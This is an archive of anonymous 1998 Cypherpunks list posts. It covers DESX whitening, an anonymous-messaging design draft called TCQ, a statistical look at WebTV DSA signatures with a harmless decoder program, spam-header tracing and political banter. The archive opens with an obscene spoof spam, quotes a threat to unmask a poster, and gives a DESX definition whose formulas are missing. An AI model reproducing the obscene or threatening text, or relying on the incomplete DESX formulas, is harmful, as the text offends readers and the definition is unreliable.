Click to learn more about this orgasmic opportunity!
Thank you,
Spermy Cyberporno
Senior FuckFest Coordinator,
Click Here for Insider Tips and Secrets for Promoting your Labia Online
P.S. If you would prefer not to receive future propositions from Fuckme.com, please reply with a nude picture of yourself, all attractive female family members, and all attractive female friends in suggestive poses pleasuring each other and you will be automatically removed from our mailing list.
Michelle spammed:

@_date: 1998-10-10 18:58:20
@_author: Anonymous 
@_subject: No Subject 
I suppose the cyphernomicon doesn't count as furthering the cause to

@_date: 1998-10-11 05:11:47
@_author: Anonymous 
@_subject: No Subject 
ahhh, so when you say "cypherpunks write code" that also
means articles and other writings too????
so you can be a cypherpunk by writing a lot of stuff ABOUT
cypherpunks code????
but just cause you write the code or text, that's only
one part of the equiation, right???
in other words is david chaum a cypherpunk????

@_date: 1998-10-11 06:22:01
@_author: Anonymous 
@_subject: DESX 
DESX is a modification of DES which uses a 64+56+64 bit key, with
what is called "pre- and post-whitening".  Specifically, break the key
into three pieces, 64 bit K1, 56 bit K2, 64 bit K3.  Then DESX is
defined by:
where P is plaintext, C is ciphertext, and DES (K, P) is the DES
encryption of P under key K.
The encryption then has three steps:
The first and last steps are called "whitening" because by xoring with
a random value, any structure is destroyed.  White light is a uniform
and unstructured mixture of all colors.
Whitening has been adopted as a general tool in constructing ciphers
these days and many of the AES candidates use it.  It makes things more
difficult for the cryptanalyst as he won't know exactly what values are
being fed into the guts of the cipher.

@_date: 1998-10-11 08:47:39
@_author: Anonymous 
@_subject: No Subject 
Sunday, October 11, 1998 - 01:11:20 MET
It's messages like this which make the cypherpunk mailing list more bearable... NOT :- )
-> Subject: N/A
-> Date: Sat, 10 Oct 1998 22:18:31 +0200
-> From: Anonymous (remailer at hr13.zedz.net)
-> To: cypherpunks at cyberpass.net
-> PS. there is someone on this list who knows who i am. yes there is someone who knows who anon
-> posters are. we fucking hate you and am waiting for you to take the trap and we will reveal your identity scumbag.
- Scumbag
Interesting terminology... :- ) I got this nifty little slang dictionary which has this word in it...
"Dictionary of Contemporary Slang" by Tony Thorne... ISBN 1-85980-003-3 [on the back of the dic] and it's worth 12.99 in British pounds :- ) Published in 1994
Copyright (c) Tony Thorne 1990
The moral right of author has been asserted
A CIP entry for this book is available from the British Library
Printed in Britain by Clays Ltd, St. Ives plc
ISBN 0 7475 1735 5 [on the second page]
Comments on back of book: More than 5,000 racy and raffish colloquial expressions - from Britain, America, the Caribbean, and other English-speaking places.
'Fascinating. Certainty a book I shall want to keep on trucking with.' Daily Mail
'Wonderfully informative.' Observer
Definition of 'fucking': adjective
an intensifier used with other adjectives to emphasis. Like "bloody" it is also one of the very few examples of an 'infix' [a word component inserted before the stressed syllable in the middle of a polysyllabic word] in English.
    e.g. 'Jesus, it's f****** cold in here.'
    e.g. 'Abso-fucking-lutely.'
Definition of 'scumbag': noun, [origin] American
a deceptive person. This term of abuse is now widespread and is permitted in the broadcast media, in spite of the fact that its origin, unknown to many of its users, is as an obscene phemism for condom, 'scum' being an obsolescent American term for semen. The word was adopted by British speakers around 1985.
    e.g.. 'Even scumbags have right here in the USA.' [Red Heat, US film 1988]
Oo and a bottle of rum,
PS: If I remember correctly, the main actors in Red Head were James Belushi, and Arnold Swatznager [something like that]....

@_date: 1998-10-11 08:47:43
@_author: Anonymous 
@_subject: none 
> PS. there is someone on this list who knows who i am.
  > yes there is someone who knows who anon posters are.
Damn straight!
There's anon over there behind the larch,
trying not to be seen.
Or do you mean anon in the filing cabinet
(she's trying not to be seen, either).

@_date: 1998-10-11 10:54:13
@_author: Anonymous 
@_subject: TCQ ascii version 
(c) 1998 Frank O'Dwyer. Verbatim copying and redistribution in any
medium is permitted provided this copyright notice is preserved on all
                            fod at brd.ie
This document sketches the design goals and features of "TCQ", a work
in progress with the aim of providing a mix of features offered by
ICQ, IRC and email -- but using cryptography to provide strong
anonymity and privacy. As the name implies, TCQ "(They Seek You") is
similar in purpose to ICQ ("I Seek You"), but with a very different
emphasis. TCQ is motivated by the recognition that people being sought
do not always wish to be found, and that those doing the seeking
(people, organisations, or governments) can be threatening. TCQ is
also motivated by a desire to make the use of strong anonymity easier
and much more common, riding the current wave of popularity of
"anonymous" services like IRC, ICQ and webmail.
TCQ is in the early stages of being designed and prototyped; this
early draft is being made available now to solicit comments (and
assistance) from anyone with an interest in this project.  Some
initial design decisions and the rationale for them are also
documented here. It is planned to make TCQ freely available in source
and binary form, under a liberal licence (such as MozPL, or a
BSD-style licence). If you can contribute ideas, or code on those
terms, you are welcome to.
Basic political background to this, intended for general consumption
(including people who may not be aware of what GAK is, etc.). This is
just a sketch. - FOD
Anonymous communication is hugely popular. Vast numbers of
non-technical people use services such as ICQ ( and
Hotmail ( because they want to communicate privately
and anonymously. However, these systems only offer a weak form of
privacy and anonymity. They use unencrypted links (which can easily be
tapped), unencrypted messages on centralised servers (which can easily
be commandeered or shut down) and well known sites (to which access
can easily be blocked). They also use communication links that can be
traced to individuals, albeit requiring some effort.
Systems which offer much better privacy and anonymity are available
(for example PGP, Cypherpunks remailers), but relatively few people
use those systems. This is partly because relatively few people know
about them, but mainly because they are difficult to use. There is a
lot of additional theory on strongly anonymous and strongly private
communications [ref Cypherpunks literature here], but few
implementations of any sort and no mass-market implementations. (that
I am aware of - FOD).
In the case of strong anonymity, most services thus far have been
based on email. Email has a strong culture of being suspicious of
"fake names", and this is another factor in the lack of mainstream
take-up of strong anonymity. However, with services such as IRC and
ICQ, "fake names" are the norm -- these cultures are now becoming
mainstream and they may be more receptive to strong anonymity.
At the same time, an individual's ability to communicate with true
privacy and anonymity is under threat from various quarters, including
for example:
o Government Access to Keys. Proposals designed to allow governmental
access to private communications, (including encrypted private
communications between individuals) have been circulating for some
time in many jurisdictions including the United States and Europe.
These proposals are typically sold on the back of "hard cases", such
as a claimed need for law enforcement to be able to intercept the
communications of paedophiles and terrorists.
o Physical border inspections. Users who cross borders may be subject
to customs inspection of any computer equipment they may be carrying;
for example, if their laptops contain (or appear to contain) encrypted
information, they may be required to provide the key(s). On the other
hand, if their information is not encrypted, then users' confidential
information (private diaries, letters, business plans) is
exposed. There are rumours that some countries (such as the UK)
already perform such inspections.
o Centralised Services. There is a growing trend to move
security-critical services off users' own PCs and onto the web. Prime
examples include online backup and webmail. Even non-technical people
often instinctively react to this by becoming "anonymous" (e.g. lying
about their names and location). However, this is still a very
hospitable climate for attack by governments and other parties, and in
any case, the level of anonymity is weak. Also, in so far as such
services benefit privacy/anonymity (e.g. webmail), they are easily
monitored, blocked, or shut down.
o Strongly Identifying Protocols. Commercial security products, some
of which apparently offer strong encryption and privacy, are almost
universally based upon "X.509 certificates" and trusted third parties
known as "Certification Authorities" (CAs). This trend is worrying for
a number of reasons:
  o X.509 is typically used as a strongly identifying protocol, and the
  analogy is often made between X.509 certificates and a driving licence
  or passport. Although X.509 can facilitate private communications, it
  effectively prevents anonymous private communications since by design
  it requires you to show your "passport" to strangers.  (X.509 does not
  have to be used this way, but people are often encouraged to use it
  that way.)
  o Use of X.509, and in particular establishment of public CAs, is
  likely to be heavily regulated. Proposals have been made to "licence"
  CAs, for example. Regulated management of individuals' encryption keys
  is not a healthy development for online privacy.
  o Extensions for governmental access to keys have been made to X.509,
  and X.509 is at the heart of some governmental strategies to mandate
  key access.
  o If Public CAs take off then they will turn out to be single points
  of failure and an extremely attractive attack target. Anyone
  (individual, corporation or government) who can compromise a public CA
  is in an excellent position to attack the communications of all users
  served by that CA.
o Logical border inspections. Communications that cross cyberspace
borders may be subject to traffic monitoring and/or filtering. This
might occur at corporate firewalls or at well defined national "entry
points" and "exit points".
o Non-repudiation. Some systems for private communications have as a
side effect that it is difficult for a person to plausibly deny
sending or receiving a particular message. This is sometimes welcome,
but it can be a problem if the person thinks he or she is
anonymous. For example, a warm body might be linked to a message just
by being found in physical possession of related cryptographic keys.
Design goals
These goals are listed to give an idea of the features TCQ is intended
to provide. It is likely that TCQ will meet these goals only in a
piecemeal fashion as it evolves, doing the easy bits first and leaving
the hard bits till later. We will see. -FOD
1. Casual Anonymity. TCQ should offer a messaging service based on
disposable cryptographic identities. This level of anonymity is weak,
but it is easiest to implement and it is a start.
2. Relative Anonymity. It can be useful to have multiple identities
(or "nyms") and for some identities to be less anonymous than
others. A nym might be anonymous, identified to a friend, identified
to a select group, or generally identified to everyone. For example,
this allows for applications where the sender is anonymous but the
receiver is not. TCQ should allow people to selectively reveal their
identities (including partial information about themselves) while
remaining fully anonymous to others. TCQ should also allow multiple
identities to be maintained, with varying degrees of anonymity, and
allow these identities to be kept at arm's length from each
other. Lastly, it should be possible for a TCQ sender to selectively
reveal "also known as" relationships between one nym and
another. (lots of requirements here -- might be worth splitting this
3. Strong Anonymity. TCQ should be extensible to use, or natively
offer, stronger anonymity services (mixes, remailer-type
functionality, etc.).
4. Privacy. It should not be possible for unintended recipients to
read TCQ messages (but see the caveats below).
5. Integrity. It should not be possible for a third party to tamper
with TCQ messages. (again see the caveats below.)
6. Repudiability. It should be possible to plausibly deny having sent
a TCQ message, or at least know when this will not be the case.
7. Ease of use.
   o TCQ should be easy to install and use for average users of ICQ,
   webmail and IRC, and should not require special cryptographic
   expertise.
   o TCQ should also be easy to use for advanced users, and allow them to
   know what is going on "under the hood".
   o It should be easy for average users to become advanced users, and
   they should be guided to documentation of issues that affect their
   privacy.
   o It should be easy for developers to extend TCQ without being
   intimately acquainted with all of its workings (ideally, it should
   offer well-defined extension points wherever possible).
8. Decentralisation. TCQ should not depend upon well-known centralised
servers, since they are easily monitored and shut down. (This is
unfortunate, since many ICQ-style features are very difficult to
provide without central servers; TCQ may have to piggyback on existing
public resources such as IRC and webmail to provide these.)
9. No Special Resources. TCQ should require only resources that are
available to the average dial-up ISP user. (Users should not be
required to set up a server on the Internet for example, though they
should be able to use any public resources that exist, and private
resources if they have them.)
10. Secure Message Store. TCQ should provide encrypted and tamperproof
storage for received messages, and should provide a feature to
securely erase messages from this store. (It is arguable whether
"securely erase" is always useful -- an attacker will usually be able
to record encrypted messages in transit anyhow. However there may be
draft messages in the store that were never sent anywhere.)
11. Mobility. TCQ users will be typical dial-up users. They will not
necessarily have fixed or easily discovered IP addresses. They may
also change ISPs, move from location to location, or switch
computers. While travelling they may cross borders and potentially
they will be subject to inspections of their computing equipment.
12. Channel Independence. It should be possible to extend TCQ (with
code) so that TCQ messages can be sent over whatever channels and
drop-points are available (e.g. direct connections, email, webmail,
IRC, ICQ, ftp sites, newsgroups, mailing lists, remailers, eternity
services, etc.). Initially it should be possible to use at least IRC,
email and webmail, since these are easiest to implement, most people
have easy access to these, and IRC and webmail are relatively
anonymous to begin with. (The expectation of anonymity is also highest
on these services.) After that, use (and ultimately provision) of
anonymous remailer style services is the natural next step.
13. Programmatic Access. It should be possible for programs (robots)
to send messages via TCQ, and to automatically handle received
messages. Command line and API access, coupled with some form of
scriptability and the ability to call out to scripts to handle,
pre-process or send messages is desirable for this.
14. Group communication. Programs such as IRC and ICQ offer the
ability to have N-way chats. If it is to attract users of these
programs, TCQ needs to offer that too. (This is difficult to do
generically and securely, however.)
15. File Transfer. Messages should not be restricted to text messages,
and messages should not be limited in size.
16. Stealth, firewall negotiation. TCQ should be able to avail of
stealthy channels, and should not make its protocols easy to
firewall. Protocols that are easy to firewall are usually easy to
filter and monitor, and always easy to shut down.
17. Persistent pseudonyms, friend location. With IRC and ICQ, it is
straightforward to determine if a friend is online and communicate
with them again (although this is not done securely). Although it has
no central server, TCQ should allow this in a similarly
straightforward fashion, otherwise few will use it.
18. Key Management Independence. TCQ should not presuppose much more
than the availability of a key pair per pseudonym. This allows
different key management systems to be used, including web-of-trust,
reputation capital systems, manual key exchange etc.
19. No patent problems. TCQ should not require the use of patented
techniques or patented algorithms such as RSA and IDEA, as this would
affect its use in some countries.
20. Sugar. Popular chat clients (e.g. Mirc, Vplaces) provide various
"nice to have" features such as the ability to play sound files during
conversations and the ability to have avatars (graphical
representations of participants). TCQ should provide similar features.
Anonymity and Privacy Caveats
This is just an attempt on my part to work out what is and is not
achievable in terms of privacy and integrity when purely anonymous
participants are involved and relationships are formed wholly online
(i.e. no out-of-band contact or face-to-face meetings). I just wrote
it down here to clarify my own thinking and to capture it
somewhere. Comments on this reasoning are very welcome. - FOD.
Anonymous Receivers
When talking to an anonymous receiver, privacy of communications does
not apply in the usual sense, regardless of how much encryption is
present. This is because an anonymous receiver could be anyone (by
definition). In such a scenario, the sender should assume the worst,
namely that the receiver is not someone the sender wishes to
communicate confidential information to.  For example, the receiver
could be some entity out to determine the sender's identity or exact
location. In addition, the receiver could pass the sender's messages
on to others. Thus, not only could you be talking to anyone, you could
be talking to everyone. In a group where all relationships are
anonymous and formed wholly online, no amount of strong cryptography
or "reputation capital" changes this (see Man in the middle attacks
below). So why bother encrypting to an anonymous receiver? The only
reason seems to be that in an anonymous online relationship, privacy
comes from sender anonymity and sender anonymity might fail. If it
does, then message encryption is a second line of defence against
eavesdroppers but only if the anonymous receiver is trustworthy after
all. There seem to be plenty of threat models in which encryption to
anonymous receivers is worthless.
An example may clarify this: Nym1 wishes to admit some embarrassing
but non-identifying fact about themselves to Nym2. The reason Nym1 is
willing to make the admission is because Nym1 believes itself to be
speaking anonymously, not because it believes it is speaking
privately. After all, Nym2 could be anyone/everyone. However, if
Nym1's anonymity fails somehow, then encrypting to Nym2 can be
beneficial if there is some significant chance that Nym2 is not
revealing Nym1's messages, and Nym2 does not know Nym1 or is otherwise
not an adversary of Nym1. Similarly, if there is a significant chance
that Nym2 does know Nym1, or is an adversary, then encryption to Nym2
is pointless. In both cases, encryption is secondary and anonymity is
the point.
Anonymous Senders
The flip side of the above, from the receiver perspective, is that an
anonymous sender could be anyone. The receiver cannot assume that it
is the only person receiving the sender's messages, even if they are
encrypted. The sender could be broadcasting them. Nor can the receiver
assume that the messages are in any sense "from" any particular
sender, even if integrity protection is applied. They could be from
anyone. It seems at first sight that given a sequence of messages from
the same anonymous sender (same key pair) then each message is from
the same individual, and that reputations can be built based on that
fact. In the wholly-online/wholly-anonymous case, this is not quite
true however (see below).
Man in the middle attacks
In a group based on public keys where all relationships are anonymous
and formed wholly online, all communications within the group are
always subject to (active) man-in-the-middle attacks.  There is a
possible defence against this using scale and publicity, but
approaches such as web-of-trust and reputation capital do not work for
this. This is how it seems to me, anyway, assuming a public key system
is used, and I try to prove it below -- are there techniques other
than public key techniques that do any better? - FOD
This can be proved by informal induction; the first relationship
(between Alice and Bob) is necessarily formed by exchange of naked
public keys. No third party can vouch for the keys; there is no third
party. No reputation capital can attach to the keys; Alice and Bob
have just met for the first time. Since the public keys are naked, an
active attacker can substitute its own keys for those of Alice and Bob
during the key exchange. Thereafter the active attacker can eavesdrop
on the conversation between Alice and Bob, and can also inject,
delete, reorder, delay or modify messages at any time. As further
participants join the population, any new relationships formed can be
similarly attacked. Alice and Bob cannot reliably certify any new
participants since they can both be impersonated, and in any case, by
definition they do not know any new anonymous participants and can
certify nothing about them. For the same reason, new participants
cannot certify Alice and Bob either. Therefore, in principle at least,
the attacker can impersonate or eavesdrop on any member of the
population, no matter how large the population grows and no matter how
many messages are exchanged. Such an elaborate spoof is arguably not
feasible once some size of population is reached, but this is not
terrifically comforting. (Publicity on out-of-band channels
(e.g. face-to-face meetings) could be used to make these systems more
reliable, but these are excluded by construction -- relationships are
formed wholly online).  Reputation capital does not help, since it
does not matter how much capital Alice accrues if she can be
impersonated. The attacker can damage or abuse Alice's reputation at
any time, for example by injecting or modifying a message and making
it appear to come from Alice. What reputation capital can do, however,
is eventually defeat an attacker who for some reason is only able to
attack some of Alice's exchanges. In that case, Alice will appear to
have two public keys, one real and one fake (supplied by the
attacker). It is then up to Alice to boost the reputation of the real
key and damage that of the fake (assuming she gets to know of it).
Initial Design Decisions
This is still very incomplete, just a few notes for now - FOD
Programming Language, Platform
o TCQ will be implemented in Java/Swing, targeting Java 1.1/1.2 and
Windows initially.  Rationale: Java code is mobile and can be
digitally signed, which leaves room for the entire TCQ program and its
data to be dumped to cyberspace while travelling, and picked up
securely upon arrival (even on a different computer). Thus a mobile
TCQ user could cross borders with nothing more than a signature
verification key and a memorised passphrase, and still restore a
secure environment in the new location. Java is also cross-platform,
so although most people use Windows a relatively easy port to other
platforms (e.g., Macintosh, UNIX) should be possible, and developers
using other platforms can provide extensions without much in the way
of special tools. It is possible to call out to scripts from Java, and
Java can be driven by script (e.g. TCL script, or E (?)). Java also
has good support for cryptography, and an internationally available
crypto library (Cryptix).
Some problems with Java are that certain aspects of it are difficult
to secure, and Java GUIs are frustrating to port in practice. Secure
random number generation and protection of sensitive information such
as keys are hard problems in Java. However, these problems are not
significantly easier in other languages, and the GUI port is much more
difficult. If necessary native code could be used to provide any
features Java can't handle.
Generic Delivery Channels
o TCQ should presuppose only generic delivery channels for messages,
allowing new delivery channels to be added easily.
Rationale: To be usable over as many concrete delivery channels as
possible (IRC, sockets, webmail, ftp sites, remailers, etc. -- see
above), TCQ should not assume too much about the channel. In
particular this means that security features should be applied to the
messages themselves, not the channels. If channels can be assumed
insecure, then people adding code for new delivery channels do not
need to implement any security features unless it is to strengthen
Some properties that TCQ will need to know about each channel type are:
o Whether it is offline or online. That is, with some channels the
other party will be present at that moment and the communication can
be real-time. This is important mainly because on an online channel an
ephemeral key exchange can take place in order to establish perfect
forward secrecy for that particular conversation. A second set of
temporary keys can also be established while online, for later use in
offline communications. For communication that takes place entirely
offline, one-sided ephemeral key exchanges could be used as a form of
key change (this would allow the related nym to persist across key
changes and also improve forward secrecy.) Whether a channel is on or
offline can be modelled as just binary (on/offline) or alternatively
as some estimate of the channel lag.
o Its anonymity characteristics. Some channel types will be more
identifying than others. For example, a direct socket channel is
relatively traceable, whereas a channel through a remailer-type
network is much harder to trace. Channels via drop-points such as
public news groups are somewhere in the middle, but nearer the
"traceable" end of the spectrum.  Message Format
o TCQ messages will consist of an XML header and a MIME-typed content.
Rationale: (This is all based on more of a hunch than a firm
conviction.) XML is readable, easy to extend and easy to process with
scripting languages. It's a nice framework for prototyping protocols,
and unrecognised detail can easily be skipped. There are also
canonical formats for XML, which lend themselves to hashing, digital
signature, etc. It's good for assertions (certificates, RDF
possibilities, W3C digsig?) too. There's also a pretty simple mapping
from protocols such as SPKI and SDSI to XML, if necessary.
MIME is a well-established standard for messaging and content
identification, and the Java Activation Framework uses it for
drag-and-drop, etc.
Something like S/MIME or PGP/MIME could be used instead of XML+MIME,
but these do not work so well in the online case and S/MIME uses
X.509. In any case, these formats can still be used if desired, since
they can be embedded as MIME-types in the body of a TCQ message.
Generic "Friend Location"
o TCQ should presuppose only generic methods of locating friends.
Rationale: locating friends (i.e. finding if they are online,
determining their current IP address or preferred drop-point) is
difficult to do without a central server network. One approach is to
piggyback on some server network that already exists, such as an IRC
or ICQ network, or netphone directories. For example if two people log
onto an IRC network using one of a set of prearranged handles, they
can readily determine each other's online status and IP address.
Another approach is to post a current IP address in a prearranged
location, such as a web or FTP site. There are also some proposals for
"dynamic DNS" which could be useful, since this is a general problem
for mobile IP. Yet another approach is for the requirement to have no
servers to be relaxed to the extent of allowing "nym servers" to be
used just for the purposes of resolving previously exchanged nonces to
current IP addresses, current drop-points, etc. Such servers could
also double as drop-points themselves or as the basis of a remailer
network, if there were enough of them. A variation on the last
approach is to have sets of users collaborating to provide location
services and message forwarding services for one another. This is
probably the most interesting approach, but it is also the most
difficult, it is vulnerable to disruption, and firewalls are a
problem. By using a generic approach, simple initial solutions can be
replaced with other solutions later.

@_date: 1998-10-12 04:47:37
@_author: Anonymous 
@_subject: Hidden WebTV signatures 
Could someone grep their news spool for a few hundred of these signatures
and post them here?  We can do statistical analysis on them and determine
whether they all appear to be modulo the same q value.
If they are DSA signatures, they should all be mod q, where q is some 160
bit prime.  Whether everyone uses the same key or different keys, they
probably all share p and q.  In that case the histogram of the values should
be flat up to a cutoff point.  We need to collect some hundreds of these
values in order to distinguish them from random 160 bit values.
The largest q value found in a dozen or so alt.weemba messages from
dejanews started with 0xc0, so q must be at least this large if they
are DSA sigs.  This amount of data was not sufficient to distinguish
from alternate theories, such as that each person has a random 160 bit q.

@_date: 1998-10-12 08:26:23
@_author: Anonymous 
@_subject: Anon poster claims anon remailers broken 
I don't post here much and in fact I haven't in at least a month
or two, but I'm willing to take this challenge.
Since you know who anon posters are, who am I?

@_date: 1998-10-12 12:59:28
@_author: Anonymous 
@_subject: Hidden WebTV signatures 
Thanks.  Each of these decodes to a pair of integer values, as described
by Peter Gutmann.  Here is a histogram of the high order hex digit:
# Values    Digit
   54         0
   35         1
   56         2
   49         3
   43         4
   50         5
   47         6
   57         7
   45         8
   43         9
   49         a
   54         b
   44         c
    0         d
    0         e
    0         f
It cuts off at "c" and is pretty uniform up to then so it does indicate
that the values are uniformly distributed modulo a common 64 bit value.
The last few values, numerically, are:
This suggests that the "q" value is probably a 160 bit value starting
with 0xcd.
We can't tell whether there is a common key or whether every unit has a
different key.  In either case it is likely that p, q and g will be shared
among all units.  The individual part is the secret x value and the
public y = g^x mod p.  Probably there is no way to find these from
the signatures.
For reference, here is the 20 minute program which produced this output:
   TAG_INTEGER     2
 TAG_SEQUENCE    16
unsigned char asctobin[] =
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0076, 0200, 0200, 0200, 0077,
    0064, 0065, 0066, 0067, 0070, 0071, 0072, 0073,
    0074, 0075, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0000, 0001, 0002, 0003, 0004, 0005, 0006,
    0007, 0010, 0011, 0012, 0013, 0014, 0015, 0016,
    0017, 0020, 0021, 0022, 0023, 0024, 0025, 0026,
    0027, 0030, 0031, 0200, 0200, 0200, 0200, 0200,
    0200, 0032, 0033, 0034, 0035, 0036, 0037, 0040,
    0041, 0042, 0043, 0044, 0045, 0046, 0047, 0050,
    0051, 0052, 0053, 0054, 0055, 0056, 0057, 0060,
    0061, 0062, 0063, 0200, 0200, 0200, 0200, 0200
static int
decode64 (const unsigned char *inbuf, unsigned char *outbuf)
    int w = 0;
    int cnt = 0;
    int ci, co;
    unsigned char *op = outbuf;
    for ( ; ; ) {
        ci = (*inbuf++);
        if (ci & 0x80)
            break;
        co = asctobin[ci];
        if (co & 0x80)
            break;
        w = (w << 6) | co;
        if (++cnt == 4) {
            *op++ = (w >> 16) & 0xff;
            *op++ = (w >>  8) & 0xff;
            *op++ = (w >>  0) & 0xff;
            cnt = 0;
            w = 0;
        }
    }
    if (cnt == 1) {
        fprintf (stderr, "Bad base64 input\n");
        exit (1);
    } else if (cnt == 2) {
        *op++ = (w >>  4) & 0xff;
    } else if (cnt == 3) {
        *op++ = (w >> 10) & 0xff;
        *op++ = (w >>  2) & 0xff;
    }
    return op - outbuf;
static void
hexdump20 (unsigned char *data, size_t datalen)
    if (datalen > 20) {
        int cnt = datalen - 20;
        while (cnt--) {
            if (*data++ != 0) {
                fprintf (stderr, "Error, more than 20 byte output\n");
                return;
            }
        }
        datalen = 20;
    }
    if (datalen < 20) {
        int cnt = 20 - datalen;
        while (cnt--)
            printf ("00");
    }
    while (datalen--) {
        printf ("%02x", *data++);
    }
    putchar ('\n');
static int
decodetag(unsigned char **buf, int *length)
    unsigned char tag = *(*buf)++ & 0x1f;
    int len = *(*buf)++;
    if (len & 0x80) {
        int lenlen = len & 0x7f;
        len = 0;
        while (lenlen--) {
            len <<= 8;
            len |= *(*buf)++;
        }
    }
    *length = len;
    return tag;
main ()
    unsigned char buf[1024];
    unsigned char *bp;
    unsigned char outbuf[1024];
    unsigned char *op;
    int outlen;
    int len;
    int tag;
    while (fgets(buf, sizeof(buf), stdin)) {
        bp = buf;
        while (isspace(*bp))
            ++bp;
        outlen = decode64 (bp, outbuf);
        if (outbuf[0] != 0x11) {
            fprintf (stderr,
                "First char of output not 0x11, unexpected!\n");
        }
        op = outbuf + 1;
        tag = decodetag (&op, &len);
        if (tag != TAG_SEQUENCE) {
            fprintf (stderr, "Output is not a SEQUENCE, skipping\n");
            continue;
        }
        tag = decodetag (&op, &len);
        if (tag != TAG_INTEGER) {
            fprintf (stderr, "First value is not an INTEGER, skipping\n");
            continue;
        }
        hexdump20 (op, len);
        op += len;
        tag = decodetag (&op, &len);
        if (tag != TAG_INTEGER) {
            fprintf (stderr, "Second value is not an INTEGER, skipping\n");
            continue;
        }
        hexdump20 (op, len);
    }
    exit (0);

@_date: 1998-10-12 16:27:15
@_author: Anonymous 
@_subject: No Subject 
Monday, October 12, 1998 - 10:00:42 MET <--Suspicious Central European Time Zone
Hey, there's a SALE on MISSILES at COSTCO!!!
No, not _that_ China Overseas Shipping Company....
the one that merged with Price Club!

@_date: 1998-10-13 03:22:29
@_author: Anonymous 
@_subject: Gates v 2.0 
Besides the FBI's DNA database, in today's (Oct. 12th, 1998) New York Times is a John Markoff commentary "
Memo Offers a Glimpse of Gates 2.0" about a 14 page memo written by Bill Gates in Sept., entitled "The Era Ahead".
In this memo, Gates "describes a new system to be called Megaserver
which will provide computer users with access to their personal
information and electronic mail wherever they have an Internet Holy Hotmail Batman! That Bill is right on top of things!
Further along, the article paraphases Bill that that the operating system "will play an increasing role in protecting intellectual piracy
against from data piracy by tracking the use of information
and preventing illicit copying."
I can see my future now, logging into Windows 2000 with the handy keyboard DNA sampler. However, all of my software is registered to my dog. Here boy...

@_date: 1998-10-13 04:13:27
@_author: Anonymous 
@_subject: Gates v 2.0 
> I can see my future now, logging into Windows 2000 with the handy
  > keyboard DNA sampler.
Can you imagine how disastrous wil be a DNA sampler designed
by the company that can't even produce a usable text editor?

@_date: 1998-10-13 21:45:26
@_author: Anonymous 
@_subject: Hidden WebTV signatures 
I have no idea to wherre to begin an analysis....  The begining is noticably
the same.  with more variation the farther along.  A header or version
identifier?  obviosly can't be a straight hash.
has with your

@_date: 1998-10-14 09:49:42
@_author: Anonymous 
@_subject: IP: ISPI Clips 5.35: F.B.I. Set to Begin Using National DNA Database 
NICHOLAS WADE writes
  > Access to the DNA data base is permitted only for law enforcement
  > purposes, with a $100,000 fine for unauthorized disclosures...
Is this supposed to be good news, or bad?
As usual, those with the greatest ability to misuse the data --
and the greatest desire to do so -- control the database.

@_date: 1998-10-14 10:01:25
@_author: Anonymous 
@_subject: ATTN: BlackNet, sog's keys 4 sale 
Dear BlackNet,
TOTO Enterprises, Bienfait, Saskatchewan hereby offers
for sale sog's key under the BlackNet anonymous
information market.
Payments must be in anonymous ecash delivered to a
digital dead drop to be arranged later.
Or alternatively, we are willing to take bids in
bottles of Scotch delivered to TOTO Key Escrow
Services, Box 281, Bienfait, Saskatchewan SOC OMO.
Please find enclosed Son of Gomez's key.
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  ***********

@_date: 1998-10-14 17:56:23
@_author: Anonymous 
@_subject: No Subject 
Sorry, but I am not aware of any threating messages posted to this list. Of course I can see how your organization may consider calls by the citizens for a return to a Constitutional government a "threat".
I woun't be calling you but I will be calling my congressman and senator in the morning reaffirming my support for a flat tax and the abolishment of the IRS.
Have a nice day,
I am TOTOCUS!!

@_date: 1998-10-14 21:22:42
@_author: Anonymous 
@_subject: anti-spam lesson Re: Earn your worth not mlm!!! 330-258-9131 
this guy knows this is a mailing list by the way he forged the from header. he knew the administrator address for the list.   Quick anti-spam note  by
looking at the received header all the way on the bottom of all of them we
see that the originating host was:
a modem slip account from detroit michigan on the at&t service.
that is about the best we can do as far as establishing this persons
identity, but a copy of the message including the headers forwarded to abuse
or postmaster  of the message will have the problem resolved in no
time.  If everyone takes 2 min to do this it will definiately get the
account removed.  I guess I just do this for revenge though.  It is fun
getting all of the cancellation notices in your e-mail.'
Received: from  [206.15.171.132] by mx05 via mtad (2.6)
with ESMTP id mx05-cJNB5S0058; Wed, 14 Oct 1998 01:56:46 GMT Received: (from ichudov at localhost) by  (8.8.5/8.8.5) id VAA07486 for cypherpunks-outgoing; Tue, 13 Oct 1998 21:49:42 -0400 (EDT) Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2]) by  (8.8.5/8.8.5) with ESMTP id VAA07474 for ; Tue, 13 Oct 1998 21:49:38 -0400 (EDT) Received: (from cpunks at localhost) by sirius.infonex.com (8.8.8/8.8.8) id
SAA17622; Tue, 13 Oct 1998 18:53:38 -0700 (PDT) Received: from cyberpass.net (cyberpass.net [209.75.197.3]) by
sirius.infonex.com (8.8.8/8.8.8) with ESMTP id SAA17594 for
; Tue, 13 Oct 1998 18:53:30 -0700 (PDT) Received: from toad.com (toad.com [140.174.2.1]) by cyberpass.net
(8.8.8/8.7.3) with ESMTP id SAA15571 for ; Tue,
13 Oct 1998 18:54:56 -0700 (PDT) Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id SAA13884
for cypherpunks-unedited-outgoing; Tue, 13 Oct 1998 18:41:58 -0700 (PDT) Received: from 12.67.146.158 (158.detroit-03.mi.dial-access.att.net
[12.67.146.158]) by toad.com (8.7.5/8.7.3) with SMTP id SAA13879 for
; Tue, 13 Oct 1998 18:41:54 -0700 (PDT) Precedence: bulk X-Mailing-List: cypherpunks at algebra.com X-List-Admin: ichudov at algebra.com X-Loop: cypherpunks at algebra.com

@_date: 1998-10-14 21:52:35
@_author: Anonymous 
@_subject: son (Gomez is coming!) 
Son of Mother Of All Chapters -- SPACE ALIENS HIDE MY DRUGS!!!
July, 1948:
The moment has come when the costumes, the grease paint, the falsely
colored scenery, the technicolored spotlights and all the other artifices
of makeYDup should be put aside and, in the interest of truth, the solid
